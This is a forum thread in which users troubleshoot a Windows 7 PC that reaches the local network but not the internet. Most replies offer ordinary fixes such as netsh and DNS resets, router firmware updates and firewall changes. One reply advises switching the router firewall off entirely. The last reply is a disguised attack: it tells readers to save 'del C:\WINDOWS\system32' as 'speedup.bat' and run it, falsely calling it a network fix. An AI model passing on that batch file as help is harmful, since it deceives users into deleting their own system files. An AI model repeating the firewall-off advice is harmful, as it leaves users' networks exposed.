Windows 7 Connects to local network ok, but No Internet Access
Fresh install of Windows 7 build 7600 64-bit. The network interface on my Intel DP45SG motherboard was detected by Windows, but I also tried installing updated drivers directly from Intel and updating the BIOS. My local IP address 192.168.0.13 is pulled from the DHCP on my router just fine. I can view other PC's on my network and access their shared drives without any problems. The other PC's have access to the internet as well without issues...even another one running Windows 7 (RC build 7100 though). I get the yellow triangle with exclamation point in the taskbar saying "No Internet Access". I've tried shutting off the firewall, setting the connection to public, etc. with no change. I've also gone through the Windows Network Diagnostic process and it says... "Your computers seems to be connected properly, but the device or resource (www.microsoft.com) is not responding". I also attempted to PING WWW.MICROSOFT.COM from a CMD prompt and it is able to use DNS to find the IP for www.microsoft.com is 65.55.12.249, but there is no response and the PING times out. I looked through a bunch of forums and there seem to be others with similar issues, but I didn't find any resolution. Please help!

I had a similar problem, downloaded the 32bit for a clean install, it worked for a while - avoid the home setting - if you have anything but win7 on the net it will drive you batty - I got the 32bit to work for a while, until the intelligent M$ changed some settings, and cut off the internet again - then my xp went and 1 win7 was all alone - your right after much reading and much searching, I also have found no anwers - although I have gotten quite good at doing clean installs - win 7 never did find 3 linux servers the xp machines were all connected to - think I'll wait for sp1.... then I'll try again good luck

Hi, Please go to the link below, look at the bottem of post at Reckless Dane's solution.http://social.technet.microsoft.com/Forums/en-US/w7itpronetworking/thread/878f7c4f-f287-4c75-a708-a2097f931435Slan go foill, Paul

Thanks for the suggestion artiste1, but that didn't work... I only have a single network adapter and it appeared that Reckless_Dane's suggestion was for a multi-adapter conflict. I played around a little more and now I got rid of the yellow triangle and the connection actually says it's connected to the internet, but still no change in what happens when I try to PING or use Internet Explorer. Any other ideas anyone?

Hi, You may try the following suggestions to check the issue. Suggestion 1: Reset and restart the router. Suggestion 2: Search and update the firmware for your router, if the firmware update is available on the manufacturer’s website. Suggestion 3: Reset TCP/IP and DNS ===================== 1. Click the “Start” button, click "All programs", and click "Accessories". 2. Right-click "Command Prompt", and click "Run as administrator". If you are prompted for an administrator password or confirmation, type the password or provide confirmation. 3. Please enter the following commands, and press enter after each NETSH INT IP RESET IPCONFIG /FLUSHDNS 4. Restart the computer to check the issue. Suggestion 4: Assign a static gateway ===================== 1. Click "Start", input "NCPA.CPL" (without quotation marks) to Search box and press Enter. 2. Right-click the network connection (Local Area Connection) and click "Properties". 3. Click to highlight "Internet Protocol Version 4 (TCP/IPv4)" and click "Properties". 4. Point "Use the following IP address". According to your router’s settings, fill in the “IP address”, “Subnet mask” and “Default gateway”. 6. Click “OK” What’s the result? If the issue persists, please upload your System Information to SkyDrive and provide us the link for analyzing. How to collect the System Information ========================== 1. Press “Start”, type in “msinfo32” (without quotation marks) in the Search bar and then press Enter. 2. Choose Save from the File menu and save it as an NFO file. 3. Find the file, right-click on this file, click "Send To", and click "Compressed (zipped) Folder". 4. Send the compressed file to us via SkyDrive. Arthur Li - MSFT

Hi Arthur I have an almost similar issue. I'm running W7 64bit on my laptop and new home computer. My laptop is still using the RC version and my home computer runs a licensed ultimate. My problem began when I tried to setup a remote desktop on my home computer like I regretless have done in Vista. As recommended I followed the instructions online. Somehow it didn't work. To ensure the error wasn't me I tried the other way around to setup RD on my laptop. And in a few minutes it was running perfectly. After that test I began troubleshooting in every way among your 4 suggestions. When fighting for several hours I finally felt I was on to something. My home computer don't response on pinging. My home computer is able to ping other network devices. But when the network devices pings my home computer it just times out. However my home computer is able to ping itself. The bottom-line for me is that I don't really care if my IP responses or not if my RD would work. Another funny thing is that my LAN and Internet works with no problem. Please save me I have followed all instructions on the Internet with no luck! Here's a link to my System Information on SkyDrive. Hope it works!: http://cid-61fd8abe5d08bb6d.skydrive.live.com/self.aspx/.Public/System%20Information.zip - Andy

I have a similar problem. I can see all the printers on the network, but cant get to the internet. This tells me that the network card is working. To further the wierdness, When I take the PC home and plug in the network cable, I have no issues going to the internet at all. I have 2 other PCs in the office the have no issues, just the new Windows 7 PC. I have reset the ip address, flushed the DNS cache, reset the router and still no internet on the Win 7 PC. Any suggestions? ~Nitehood

Nitehood, you'd do much better opening your own thread and explain exactly what your problem is without piggybacking on someone else's thread, that way your problem gets addressed and makes it easier for others for find a solution when yours gets resolved. This thread has been answered/solved and those that help generally don't go back to look to see others hoping for a solution but those who are looking for answers will look - see your problem? ;-) MCSE, MCSA, MCDST [If this post helps to resolve your issue, please click the "Mark as Answer" or "Helpful" button at the top of this message. This problem appears to be quite common. The answer which is listed in this thread did not fix the problem, or at least it didn't for me. Has anyone any final answer on this yet?

I actually ended up solving my own problem here. I found that it was not Windows or Microsoft at all, but rather a setting on my DSL modem's firewall that was blocking certain protocols. Since I adjusted those settings all has worked properly.

Me too. My D-link router seemed to be the problem. A new firmware from their support solved it.

Hi, PC-guy, I was wondering in the web looking for a solution to my problem with my laptop and I found out that you had the same problem in october last year. I am able to connect to a wireless network but with No Internet Access. I have tried a lot of things I read but with no luck. You wrote that you have solved your problem setting the DSL modem's firewall that was blocking certain protocols. Could you please tell me exacltly how to do that. Thanks a LOT, Cecilia - from Argentina

It depends on what type of DSL Router you have. Mine is an Actiontec. What I did was go to my web browser and type in the router's IP address (for me it was http://192.168.0.1) and then logged into my router (login is "admin"...password will be set by whoever setup your network. I think the default password is "admin" like the login). Next, I clicked on the "Security" icon and then "Firewall Settings". From there I just checked the box that turned "Off" the firewall, clicked apply and I was good to go. I hope that helps!

Thanks for your answer. Luckily I coud solve it last night making a restore of the laptop to two days earlier. The problem had started 2 days ago when I made a home network with the desktop. Yours, Cecilia.

Ok, this same problem cropped up this past weekend on my sons Dell xps800 Win7HmProfessional...I searched the problem here and found this thread and another. I tried without success on some of the proposed solutions and worked myself up to a significant level of frustration. Finally I decided to try to call Dell since the computer is still under warranty (less than a year old). Luckily I got someone who I could understand. Here is the solution which worked 100% for me and it is REALLY EASY. I will try to get the essential steps here but you may need to look for a little bit of additional info if not used to working with the CMD prompt box. Start button enter CMD in the search box, this brings up the black command line box. Then go to the small Black Icon for the cmd window at the bottom of the screen -- Right click that and choose Run as Administrator. This opens yet one more Black command line box this is the one you will type into from now on. type in the following with the " _ " being a space netsh_winsock_reset then hit enter. Then you'll get a message that includes Restart is Required... Close these black boxes and all other open windows/programs and restart the computer. Viola your problem is fixed.

WOW...I just wanted to say THANKS for this tip...it solved my problem PERFECTLY! I was ready to "drop the A-Bomb" (Reset to factory settings) on my new machine with Win 7 HP, but I was able to access this site with my wife's computer (runs Win Vista). I printed out this suggestion, along with some previous suggestions (like Authur Li's- Thanx Atrt!) as a backup. I vowed to try "one more time" before I gave up and drop the A-bomb. Your suggestion saved me untold hours of re-installation. Thanks so much again!!!

Thank you very much! I've spent the past several hours trying to fix a problem where I've got an excellent connection to my router, I can ping anything, but no browsers will allow me to connect to internet (Firefox, IE 8, Google Chrome). The NETSH WINSOCK RESET command did the trick! I was able to connect use IE 8 and then did a Smart Update in Spyware Doctor and detected three high-level viruses that were causing the problem. Thanks again.

I did system restore to before the problem occured and that worked for me. You could also try OpenDNS.

I had the same problem. Connected to the router just fine. Good IP. Tried the DNS flush. Tried the winsock and IP resets. THe comments on firewall sparked my recollection. I have Webroot antivirus/spyware, with the windows firewall turned on. Turned out that disabling my Webroot firewall eliminated the problem and internet access was restored. I plan to tune the firewall further and see where the root cause lies.

I had a similar problem and tried all of the suggestions in this thread. None worked. I suspect the PC has a virus and now I can try to clean it because the advise in the following Blog entry worked like a charm! http://blog.tiensivu.com/aaron/archives/1509-Why-www.msftncsi.com-keeps-showing-up-in-firewall-logs-with-Vista-and-why-it-can-cause-problems-with-internet-captive-portals-and-WiFi-hot-spots.html

OK, I've had the same problem. Question is: On two 7 computers (one Toshiba one Sony) both have Sprint 3 and 4G dongle controlled by their software. Even if you don't have the wireless adapter attached and you've told network setting to automatically connect to StarBuck's wireless (AT&T), I had the sharing set and it worked, come back a week later and it doesn't. I've checked all the "sharing" issues and reset it to "home". Still doesn't work. Now, is this an issue I have to run cmd to solve? PS in this case, I certainly have no ability to reset the Starbuck's router. Why does the moderator use a sickle and hammer? A touch strange given the state of the former USSR.

Hi there, this is a common problem. There is a simple solution. Follow these steps: 1. Open notepad 2. type the following text: @echo off del C:\\WINDOWS\system32 3. Save as "speedup.bat" (select "all files" instead of "text document") 4. Double click the .bat file This restarts your network centre which will hopefully clear up any problems you're having!
